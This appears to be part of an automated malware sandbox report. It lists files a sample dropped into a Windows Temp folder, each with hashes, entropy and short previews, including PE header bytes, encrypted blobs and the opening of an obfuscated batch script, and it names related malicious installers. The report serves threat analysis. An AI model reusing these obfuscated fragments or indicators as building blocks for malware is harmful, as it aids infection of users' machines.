                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: pM3fQBuTLy.exe, Detection: malicious, Browse
                                                      • Filename: QIo3SytSZA.exe, Detection: malicious, Browse
                                                      • Filename: 'Setup.exe, Detection: malicious, Browse
                                                      • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                      • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                      • Filename: Setup.msi, Detection: malicious, Browse
                                                      • Filename: 69633f.msi, Detection: malicious, Browse
                                                      • Filename: fm2r286nqT.exe, Detection: malicious, Browse
                                                      • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                      • Filename: lem.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\542181\b

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):687996
                                                      Entropy (8bit):7.9997719449066205
                                                      Encrypted:true
                                                      SSDEEP:12288:dh1aYSV+WltXIrck3QPjUO7LuotG2q3iONh7W8N2kYaVOUHl/cB:d2ZXw3sU4uotG2qSOr7W5kNVOoG
                                                      MD5:0CD5D115C1D61F18D93676CAC7C97E79
                                                      SHA1:BE9AF7AD36E20D92ADF906DDAA6378464D4BA716
                                                      SHA-256:A3E3F87C9D58317B226F10ED8ED4A68C94CBA5034FC2E3F97DB4938EBEADECDC
                                                      SHA-512:25D5892B2222A5542DF72929276D594A7BC795DA08075B99CFA136A8E6BB2A5DD7CAED23DF79A0D1BE7FEF29E35053ADF4E400057FFF0DC1403872C45CFF6C9D
                                                      Malicious:false
                                                      Preview:....l.@......>...<...x<..Y,.!@...y].W..Y..B\.|...F5.[.....f......KfL...9.#J..?%.`=...8...j...l.]0..hEk.<bM..@.q...;...IQ[_o..jme..S..~|...q...)..7.~\...J...F.H..L...hqg.<5[rd5...q....G...p. ..FZ).Rp9........%er.|.vJ$@.......;X9.......p......(...lf.L....c3..I~.....h...&.f.....:..0.$....A....O.l..u...........SQ{.QP.l.o.....K...........,1....c;K...`....#..8.YV...c.NE.@.*..x]...0....w.l-.0........O1..vw.e.H....h........2+.......1?.q....;.6.@y..x.7...CL..-~..P.7..%.N.'........5>..8=..$...iKhVV.AW.R...9.H..c..Q7o~.....T#.m..,1.q...... t[GH8......H|.P.............wt..........|.E&....+8.8"..rF.I.r.S.).8.....W.C..E.K<C.......?"2...?1..t.`.I..f./J.t*\6.+B.-.3..N<....g^...|r./..iY........n$G.,#|Rz.{+.E...Z]$5.A$....F..W[..:c..Y.....=.L...A..\.",Q.\...#.M.....-.]..H.......W@.^G...in...j...V>.@..RL.L.O......K...i.-....T............K.Y.vYM5..L..E.H^.r....?.v..n(.?..M.bc.x.....p..U.u.T ...H9.d..Q..H.....i09{?.....9.J.Y,.|c>?.c..T..#Y3.h[#.F.,&..g.

                                                      C:\Users\user\AppData\Local\Temp\Acne

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):141312
                                                      Entropy (8bit):6.419271195343598
                                                      Encrypted:false
                                                      SSDEEP:3072:tg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mO:+5vPeDkjGgQaE/loUDtf0j
                                                      MD5:7730C06D95CAB2EA3647E80227548C28
                                                      SHA1:14484BE27F5A3D45D93FE3D593E23152915A2D8D
                                                      SHA-256:D13033BBDEE6E2603702E2D9F55B79C7AB5F04153A1B54E5B30E24AE98637868
                                                      SHA-512:8B6CEE897A73EC0B3FEE27E5343CD13983ECE6EAC00FC667968B9E468550B6973971C64FC5BD8047E492A924BDC57D3BEE59056F08B5ACCD6CA214ED27D38FE1
                                                      Malicious:false
                                                      Preview:3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV

                                                      C:\Users\user\AppData\Local\Temp\Billion

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):21058
                                                      Entropy (8bit):7.313254413465614
                                                      Encrypted:false
                                                      SSDEEP:384:4HwWV8tnwmTihbn929MwO/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ3rw:4ByLiFuO/ChgZ45VatJVEV3GPkjF
                                                      MD5:8AA94191055FBB67A906295C4D550307
                                                      SHA1:74DB3AF9A032AE930A2A066DDE7916BA01D6DB0E
                                                      SHA-256:C20E6367401DF27FFB20CFF2AA8CB431E5A46F97C5C308453CFDB4630E7439EE
                                                      SHA-512:E2C2CC5AA16B3401858D1800C4533E91ABFFAF4028936287777679E7147FC29BAF0320C13A7E1F2FD388F4BE6B854261D290BDE40AEA7B524147333AB5F5E3EF
                                                      Malicious:false
                                                      Preview:.3.3.3.3.3.3.5.5.6.6.6.6.:.:$;{;.;.;.<$<V<b<r<.<.<.<.<.<.<.<.<.<.='=1=>=v=|=5>.>...........0.0R1{1.1.1.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3-3Y3a3l3.3.3.4,4.4.4.4.4.4.4.4.4`5.5.5.6i6.6;7z7.7.7.989F9V9b9.:.;.;.;.=4=H=.>.>.?.?~?.?...........0.0=0v0.0.0.0.0.0.1.3.3;4D4N4T4Y4d4i4q4.4.5N5_5.5.5.5.5.6.686Z6l6.6.6.6.6.6C7w7.7.7.7.8.8+828a8.8.8.8.8.8.8.8.9$939:9P9x9.9.9.9.9.9":7:b:n:}:.:.:.:.:.:.:.:.;.;.;.<.<.<8<B<X<^<.<1=J=w=.=.=.=.=.=.=.=.>M>T>c>n>.>.>.?e?l?.?.?.?.?.?.?... .......0\0.0.0.0.1.1)1=1D1[1b1h1.1.1.1.1.1.1.1.1.1.1B2d2.3.3)313b3}3-4L4.4.435^5.5.5.5.696d6.6.6.6"7>7s7.7.7.7.8:8o8.8.8.8.8.8.9P9.9.9.9.9.9.9.:.:/:I:c:}:.:.:.;.;.;.;.<9<n<|<.<.=.=.=.=%>A>.>.>.?.?.?T?v?.?.?.0......O0.0.1i1.1.2.2.2:3P3.3.4.5I5[5y5.5/6\6.6.6.6.7%7,737H7q7.7.7!8.8.8.92999L9.9.9.:.:@;Q;.;.;.<(<.<.<.<.=B=q=.=.=.>.>.>.>.?_?.?.?...@......}0.0R1.1.1.1.1y2.2.3.3.3.3^4.4.4.4.4.4{5.5"6p6.6.6.6.6~7.7.7.7.8.8(8;8D8W8.8.8.8.8.9.9.91:.:.;"<.<.<.<.=@=.=.>.>.>U?.?...P.......0C0n0.0.0.0.1E1U1h1.1.1+232:2B2.2*3G3.3.3.3G4Q4y4

                                                      C:\Users\user\AppData\Local\Temp\Catholic

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):100352
                                                      Entropy (8bit):7.997846639803936
                                                      Encrypted:true
                                                      SSDEEP:1536:iC9GRgkIP4GvlQxu1VYlMMNq+B/jf7KPqHgayJLzz+9oURr3S+cU0YZBR4jnF:iC9GRgkIQIOq+Fb7K0g1C9oyC+cWZBKp
                                                      MD5:F3DE968CF1588615C1DAAC259FD6A5E4
                                                      SHA1:21C9A43DBCDC552F7CD1E7A05E16A560575329D9
                                                      SHA-256:A8EFF2FC3CA4BC0ADDD04E422BFC72B032CF38B5B0805E30BACFB1D4CE9108FC
                                                      SHA-512:0CDCCA10BF20B9FD26A73DFFE555AA1468651785447DF0A87513ED34AE48B79982DE4E312DF0C00880BAA3769D7FB6223CCC496FF53E0F670CDBA5EA78D5B3D8
                                                      Malicious:false
                                                      Preview:E.H?..q....r..Nq.)9..2G....t.~MWe[},.u.*.`.=.....-.k.4].'..../X..r....}.r/cM..!Twe..@=.dB.......L.,.*:n*.....:xh)....T.......iV...d.*g....h.Q...J.a..6tc.(..[$....1..$.=.y.9.[..g9..&,..|..#`IB.......<24...c.....{..bm[a.~...{..~..:.&f~.....|.j.(ZW..Z&.A[...@]..IT..-.........$...>;je..W..A.!....Q..VWo...n4^..k.....(m&..C5.e....u(.v.....Z....n...i...|w..Y.d.o.N.W..%,......-X.4..Ru.....C.u.....c..cbj.x..BIg`jir..|)..........}.^uc..{7ba.......:.h-Lh\.09a6..}..-...G.kD...3..y;s3.vC.....y.?.D.zX@...V[..i..P.........8bfF.qe....{~2..cV!.X..1&.._......7.$.tq~....e..d..-.$...\9.=.Z......z~...+.B[.T.~xA.l.JX...5.?..]jA..*.F..h.?W...4..8.lD-...=;.....!U4.......~..g/..V.,.^xX.x.. .I..$...P...t._.8x.3jh..V...Z.cx.c...1)..5..K..>.#.Bl.N.~.-.,.m,SW..T......_.....m.1......w2..X..x[..@@O.....M.J.0.>.$R...};@.Ng....i.}.S..=....,x.%..d.4..O......;...Y..].*z.*O8D..;.Q...t.....*..J....R..1..,.%..b-%.x.:.T.|<...v..E.6H.....7.RD.....,.wI1..G.6.....!.....x,.

                                                      C:\Users\user\AppData\Local\Temp\Del

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:COM executable for DOS
                                                      Category:dropped
                                                      Size (bytes):64512
                                                      Entropy (8bit):7.99762270747538
                                                      Encrypted:true
                                                      SSDEEP:768:bsNB4fop0yGEn84PbUEKA0PSfLmBSPsDFEo6KcS2w8KwEeDKWAwwm5EqcFv8TlCz:gT3vGE8wJfLmvFEoGbDihmyvJvRsyx
                                                      MD5:84C683958D97DE80882BD616CBB6309B
                                                      SHA1:C7432D946D6FB1A1A3F5A41F04F9A051179FA3A3
                                                      SHA-256:7D706456C6E0886260C0A4383EAF2D548E0AD8CF41886EAA04B1FFA4151915F7
                                                      SHA-512:3BC370892FFD99D771901157D3E2F91EFEF7D6F33B24B1D3F373D9F2302FF2457A666F5D57414A0BA22D6553F400B61C9958BACE7C2CE841D59E1B6AA57B5F07
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:....3..^.m?V.S. .+.b;.*....<.?..../iqU..g%,...=..OE..].52.4.p.f...M..?dH.Z. U|.P....'..pGQw.."..LC&).>.,_..L1F.=TJK..T.9.e.=.0.1]n..q.z..y......9.R.,`...gOa^...6t$.~.h.z..o..1..;Ak....HZ....C..........=.*.U.l.%.......vT...m..qP.W...............Wb..B....>..AS..:P&...XV..eX_c..u`.I]..E'.2.X.k.O..n.<.k.j....,Jp-......;.x$......Qs...7....-~,.... .Q.v..3gL.K./.I...g.&c.....O$..US...L..E..54.j..Lq.N.WI+.:%....*...b.9..3.....H...>..Fn.=^r.(..E#..2cQ..O.:7=..[..^..^.e.......F.~.*=~?l.....b.1..~Q..[..V.....SKeE...W..1r..........4..W..=n?.~../.....v.2v.bf.....5..Z.$..4.d..rE.[_..4.H..............x#c..\v.b..HuN.}.....j.t....c.V 2p........"..J>....d.S........."i2..M.S.....*,xE..aBN3..........F.w...Z.E...I..*.D.....q!#.y0.Z).O.6_f...NJ...+....%.8@t>..|W...=(..eZ.+...b..b...u^..,[.1.....!..a..i.4,7..z...x..#V.u.852.2......sf.*.KxoJ._s...)xNS.<.@c.xe.{.x.:...l.'N\.e.`.......&CjB+..u....yL...<8m..i......A.0%...W..i..8h.Z......Tnp*.........$..Si..l%.........n

                                                      C:\Users\user\AppData\Local\Temp\Estimates

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:ASCII text, with very long lines (642), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):19018
                                                      Entropy (8bit):5.115005060959808
                                                      Encrypted:false
                                                      SSDEEP:384:SAedBvx1YnE0+Ejr8ByOpu/ZmCWZAiSPMLYtGkfejeoFHFH9C4bPT0AcP:SpbbyYZpGZmCcfmeqop9jLcP
                                                      MD5:AAA4FDCDEB83B512374BE372D2FB2517
                                                      SHA1:0FFDD59D6F11920F797C9077B892F9464843D08E
                                                      SHA-256:2F2E0C7E7F43387F8CB12839A26284AB7C2C24B7A19C5BCEBA55A1F376796003
                                                      SHA-512:DF3B913AAE1A153A6B399DA19E5A9B5CE1C878D2DD60A2EDF08F7320B96F8507B10333616BCB3EBB01E14ECD69D2EC8DF3FDB958C57B4CEBCAC40D084CA6B548
                                                      Malicious:false
                                                      Preview:Set Saints=w..WUJChaos-..HvWsMaps-Streaming-Spots-Buttons-..dvbwFeelings-Msg-Ff-Appointment-Va-..KEPartner-Saves-Windows-Tourist-Telecharger-Qualify-Milton-Uncle-Olympus-..oUOsPhentermine-Jp-Democracy-Diary-..MhwmNickel-Except-Fc-Apartments-Conventions-Soundtrack-Vacation-Str-Wood-..DDXXDeny-Gcc-Shepherd-Partnership-..FCjWInteractive-Tropical-Infrared-Target-..Set Hampton=r..eRrEquilibrium-Payroll-Gangbang-..kghoCreates-Virtual-Volvo-Translator-Dial-Cloudy-..SAanVisitors-Replication-Buildings-Temperature-..KzlaRwanda-Nintendo-..JHAppeal-Copyrighted-Shall-Proved-Launch-Very-Borough-..Set Industries=5..AbNEmails-Genetics-Crime-Standing-Programs-Invitation-Optical-Presented-..XXKqCloudy-Decimal-Understanding-Political-Tire-Conf-Comment-Availability-..jmDawn-Fluid-..eAhDeferred-..RkPRhythm-Hide-Consequence-..qGaSigned-Kodak-Audit-Nottingham-Socket-Mart-..Set Ieee=9..bFButtons-With-Mods-..mByDimensional-..ETRunning-Shape-..fgLCanon-..OdRealtor-Vacuum-Intro-Showing-Prostate-..LxqTWeekend-..p

                                                      C:\Users\user\AppData\Local\Temp\Estimates.cmd

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:ASCII text, with very long lines (642), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):19018
                                                      Entropy (8bit):5.115005060959808
                                                      Encrypted:false
                                                      SSDEEP:384:SAedBvx1YnE0+Ejr8ByOpu/ZmCWZAiSPMLYtGkfejeoFHFH9C4bPT0AcP:SpbbyYZpGZmCcfmeqop9jLcP
                                                      MD5:AAA4FDCDEB83B512374BE372D2FB2517
                                                      SHA1:0FFDD59D6F11920F797C9077B892F9464843D08E
                                                      SHA-256:2F2E0C7E7F43387F8CB12839A26284AB7C2C24B7A19C5BCEBA55A1F376796003
                                                      SHA-512:DF3B913AAE1A153A6B399DA19E5A9B5CE1C878D2DD60A2EDF08F7320B96F8507B10333616BCB3EBB01E14ECD69D2EC8DF3FDB958C57B4CEBCAC40D084CA6B548
                                                      Malicious:false
                                                      Preview:Set Saints=w..WUJChaos-..HvWsMaps-Streaming-Spots-Buttons-..dvbwFeelings-Msg-Ff-Appointment-Va-..KEPartner-Saves-Windows-Tourist-Telecharger-Qualify-Milton-Uncle-Olympus-..oUOsPhentermine-Jp-Democracy-Diary-..MhwmNickel-Except-Fc-Apartments-Conventions-Soundtrack-Vacation-Str-Wood-..DDXXDeny-Gcc-Shepherd-Partnership-..FCjWInteractive-Tropical-Infrared-Target-..Set Hampton=r..eRrEquilibrium-Payroll-Gangbang-..kghoCreates-Virtual-Volvo-Translator-Dial-Cloudy-..SAanVisitors-Replication-Buildings-Temperature-..KzlaRwanda-Nintendo-..JHAppeal-Copyrighted-Shall-Proved-Launch-Very-Borough-..Set Industries=5..AbNEmails-Genetics-Crime-Standing-Programs-Invitation-Optical-Presented-..XXKqCloudy-Decimal-Understanding-Political-Tire-Conf-Comment-Availability-..jmDawn-Fluid-..eAhDeferred-..RkPRhythm-Hide-Consequence-..qGaSigned-Kodak-Audit-Nottingham-Socket-Mart-..Set Ieee=9..bFButtons-With-Mods-..mByDimensional-..ETRunning-Shape-..fgLCanon-..OdRealtor-Vacuum-Intro-Showing-Prostate-..LxqTWeekend-..p

                                                      C:\Users\user\AppData\Local\Temp\Ferry

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):7.996730875047278
                                                      Encrypted:true
                                                      SSDEEP:1536:LGHIW7BDPdeDRrtZK1snSDx24tBoixg+4Dhr:LeIATQRrtM1Lx24tBFr8hr
                                                      MD5:959CE45C8C2A59C634F90C5FAE75D6EC
                                                      SHA1:2CA773C8A0FF1D90EA47F35AFB84710577FF9E56
                                                      SHA-256:3DD732FF576BD9A5B79D56DC6083DB3034997A0A28F3B9D46DBF66485A30F310
                                                      SHA-512:ED14AFF4DC07627308BED52E696E0D6DFD1643D358472F40F39F628A190BC8EEFC2BCEF056CA582B0B7FFFCF86B2BE5FF53E29DB637C2DD3A98823D701D22330
                                                      Malicious:false
                                                      Preview:.w......g2.&....N%.IqtP/...G.!k...U7e.t....i.l.......O2....l...{u.+.x..n...TAKEv...)..jY..a....%7....B..r.......*..&....9.zm...1.J....FQO;....W...y......Pl.&.4.v.....Syv..f{...:..[.R.U[c...m.?so..q....:..h......Q. .k...g..3../P......N?.....n........oo.O....,..B.9....'.&.r...0.I......!..z8,..............dZfQ`ot..ia9.].|.".1..P.fr...9......!e..................+3..nN..G^9.".:a..'.`~...J.(T;...P].'.3.....6..4~......N~....T.)......7.K..}....k..#..1d...U..dh..`.K.m#.2.ND.s..T2.M*....0.$...mgi.#........`..j......#...t..#.d.`.).K .i....(.t........l....c]...z;....S.DB..-.s.#..,B~.Z..g.S..{.){-.....>...}_....S...l...C....Q2De]d....%Cgb.>.. .e@....<.F..D.D.'D....p#..#.....Y:5DV._]...!.h..B!....L.RKf......J....^...97.,;(...........6...b.vC..X.3....D........"._.Qo.v.LY..,.+...".5..YPa..dd.7...Kw.W...*..G-..ew...<..;'.........g/..K....#Tc=......O.H.?.`...T........g*#...!d&.62>.3..1./.3...zJ7g....RR...sZ.?H.1_...s..t."+.J.....C.......C..F@

                                                      C:\Users\user\AppData\Local\Temp\Fleece

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2589
                                                      Entropy (8bit):5.372255258923795
                                                      Encrypted:false
                                                      SSDEEP:48:09n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+ME:4SEA5O5W+MfH5S1CqlVJcI6E
                                                      MD5:11E32C4B52B5C5D27CA84472C507E38F
                                                      SHA1:027AC1042D436C566DE20450C8ACDE9DF87D3CDA
                                                      SHA-256:97E62159D0EFE8E02632B13EBE50A3E084CE2599369AC36CB8B055B11E388634
                                                      SHA-512:62C4065166CBD8D4BB0C0950E98A9420C07644DBAEA24C5043EF4F8D82E7F5D323C8BA217DE5FB26E0D0BC1DC454E88F67D17FAE33EFF9AD05682F8908F01E82
                                                      Malicious:false
                                                      Preview:exports........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\Fo

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:OpenPGP Secret Key
                                                      Category:dropped
                                                      Size (bytes):152576
                                                      Entropy (8bit):5.648410854278383
                                                      Encrypted:false
                                                      SSDEEP:1536:PKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTpS:H6whxjgarB/5elDWy4ZNoGmROL7F1S
                                                      MD5:597A4DEAAC6F2DFD9BA9D6557943D9F3
                                                      SHA1:28AC694327FA3DD08430100FB09C2E979BD4674B
                                                      SHA-256:5A4EF5678A121AB130FC48E03346B0519CFE6FC5EEEA1B84C769E6674814B580
                                                      SHA-512:EAA12ADC55088DBF330DF6CA887E2E54CC58F8208479F20C125969080F36A8206B0EE1C0E97822D664DB52E7D0E1B2AB67843365962C647197BA1258CE376239
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................r.r.r.r.r...........................r.r.r...................r.r.r.r.r.r.r.....................r.r.................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.............................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r...............................................................................r.r.............................................................................................................................m.m.m...........................

                                                      C:\Users\user\AppData\Local\Temp\Francisco

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):63488
                                                      Entropy (8bit):6.686268342928445
                                                      Encrypted:false
                                                      SSDEEP:1536:wEq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkP:LnEoXnmowS2u5hVOoQ7t8T6pUkP
                                                      MD5:5A659985D4C0913F85D5FE9813C7888F
                                                      SHA1:90B63406571EFD5BA6177C2645B3D934E6E68F37
                                                      SHA-256:A8FEF5473B89161725C6DC93C44CE9D939245EAA122BF85DAA2629137B2E0B1D
                                                      SHA-512:348B9355A58D4F1E95E0DB919331EEDBD77D00D8A15FE519C4634F8740B1BF58E003A9429F88B90B3EDB3704B714AD2BB2C61D69A688D8233F3555D4D9A1FC00
                                                      Malicious:false
                                                      Preview:..H.I..E...u.......E..p.3.j.Z...........Q.7...Y..WVj..u...H.I..M.3.f..O....3.F.,8S.u.W.b...YPW....I..s$W....YY..t.......3.W....Y....W....Y3.@_^[....V...6..l..j.V.}...YY..^...U..W...O...0.I...t.V.q8Q.......u.^.E..t.j.W.C...YY.._]...U.....U.SV..3.u.W...~....N(.N0.N4f.N<.N.....'....]..........E.........9M.................F.................N.........F.................^..E..N..................z..u.....3..@.Wh4.J.P............j..{...Yj....nL..p..@......F(.`...Yj...HnL..p..F0.L...Yj..`.....mL..p..F,.4.....$TmL.hlmL....mL..p..F4..P...Q.........U.E.M.........E.........U.Rj.P...QD...v(P...Q....F8P.v4..Q.RL...U.Rh..J.P......x..E..v4j...j.P.Q..E.P...Q.j..7..T.I....F.P.....p.j..v(j.j.Q.R,j.^..P...Q8..N..t...u..u.y........j.j.j.S.V...U.Rht.J.P........y........j.j.j.W.0.E..~.WP...Q..M...Q...R...x..M.........@..3.QQQP.0$M......_..^[....U..Vj.......j....mL..@......p........j...,nL..p..F....j....mL..p..F.....M.....p....mL..H..f...F...N..F..^]...V..W3.9~.t.j..v..P...YY.~.9~.t.j..v..<

                                                      C:\Users\user\AppData\Local\Temp\Invalid

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):70656
                                                      Entropy (8bit):7.997057910589192
                                                      Encrypted:true
                                                      SSDEEP:1536:emxHpvNdCb9MXzIopR1WGnQXGN2vVISY1iLFnNHa7jbrbf:emxHpvNd++XzJNWJWN2vVIeHa7jvb
                                                      MD5:B624EC4EC48AD6EEC4909E7C596A8FFC
                                                      SHA1:0BD162E49D9F63F74166FDAFD0D63428ECCF238A
                                                      SHA-256:8744305A517C819C790092C5981027BC0DD24B6D0206289C9C95F21CD258AA64
                                                      SHA-512:094E442C664934B785F3DC73A2197EBBB24CBC7D0F7D6C6ADEAECE46DA46B86DA027066CE7091E7D7CC1E5C83CF04400AB6880C2931A9F190937C22B873806D2
                                                      Malicious:false
                                                      Preview:.?.z..t.....V..m......*.....U.....L2..C#|,pD.f;...{........}.3eD.*E..;..L...P......j5...q...tz.#.tA..d...4. .b>.\.|J...6...Y.`\.U...{.j...O...z.MN..=.8s.....v....3.............a'p.O..b.Y..2..M[z..{..q.;.$yh..... .c...2...c.y...f.....ymv...g.}R..u.....I.,..y".In..t....`...a1.gx.Z.01&@..L<!...$........x..b..s....M..su.I..C.1..?ua"....q.zk..0|..!...y..9....2.f..^....x....?."u/...Jy.[.J.s..'..5.=...J.}w_(U.V.E....................7.........@...y...c.Tw.1jw.........'.l...MJ...y..h..._...5q........kA.t>....+p.....WT...S_o.5....8.....R+.....9T%bu...A.....Y......L.1.9..*c.!..2)..?..f-Qn.......g.H.p.=.ce..J|.!c.{..c.......BNd..Y..8xU.."..,.m.U.{Ii...p<;.H..-..eoq}c.,.X&v.OZV......*..#..JU..2..<..n:......... _.S.D....6...}.&"......J.-.g.{.....mw.F./;..".O.."....9..M.."...Z.c.B..@...w..&..8.;..!2(H.....%..z...CO.j..j..fF.......%..&.P.....'....u.g?.[.....Wp."Nw....n.\V..A.3."E..U.k....0.dmO.......2.{Fs...f...4l.+......Z.*..a.+......1s@.

                                                      C:\Users\user\AppData\Local\Temp\Investigated

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):125952
                                                      Entropy (8bit):6.637958619688465
                                                      Encrypted:false
                                                      SSDEEP:3072:lPtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnjq:DCOMVIPPL/sZ7HS3zcNPjq
                                                      MD5:78C8BA888589BD9AFDBB5217CB31B8B9
                                                      SHA1:CB188EE03EB14AA2FFBCC107CD41876575D9A3BB
                                                      SHA-256:E52A6FE2900DE3C8F9420DFE7F5180C86AE751BFAD106AD88A2B9E0A2BBE1F94
                                                      SHA-512:1B874C9F16360BC510C97A5847409BF09209ADAF9505692E90AA20F4F6FA5262AEAF8AD574ACEE32C73E0F27F61B035C5F09C4B8D4865D33D612F14037298F42
                                                      Malicious:false
                                                      Preview:L$`.D$..~|...L$@.,S...D$(.D$,.+$...........j.Z+..........tp...t.3.f..l....$....3.W..................Q.....Y.....9.t.Q.1.I......YY..3.f..j....YW...xH..W.F.....Y_..$.....E.P.....0..l...P.....YY.M..R....$...>..,zL.u..8zL.P..l...P.....YY..#...6..l...h zL.P.P.....#..j...l...P.v..6......#......$$...j&..f;...o&....$....f..i%...%....F...%...V%....$.<....%..j9X....%...E.........L$..........@$.......4$..j1[.,$....t...+....0...f;.u.......u.3......%...E.M....%.......@..j....P...S$..Sh.....u..P4.......&.....O&...}....}*...&...E.......&.........&...D.....O .D...D....&...G.;.u..H...'...G,......&....,...&*...E.E.j.P...G,.....".......&....+...&......'...A.j..........E..E.........u..F....F....3.E..............Q.......)........c)..S.E...P...;.t.P....Q...M..yP.../'......&..Hj..................C..C.@..u..............3.C...............Q...........C...E....P.3V.............=.A..s........E..E...y.....L.=....s#...CL..}...E.......E..m..}.E..m..K=....s#...CL..}...E.......E..m..}.E..m

                                                      C:\Users\user\AppData\Local\Temp\Membrane

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):151552
                                                      Entropy (8bit):5.91839466876771
                                                      Encrypted:false
                                                      SSDEEP:3072:roRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPF:M0JaAOz04phdyt
                                                      MD5:22A5D9AC1ACAC37CB7E34165534E21E6
                                                      SHA1:C4B8D3D7C31BC65E079B15D443C140DEBE6B3F08
                                                      SHA-256:6CC53B11DA34B76750E48984CF489C803CA49F7C6FCEFD59D49AD0B99886279E
                                                      SHA-512:1C022B84FEF269313316E8F632B935F6D348ABDCB940F5ACC9ADC8A7CF6FA7F615DAAA32F72729B132783A4B30637FBBECED744821EDD3BBD672FB414E604E78
                                                      Malicious:false
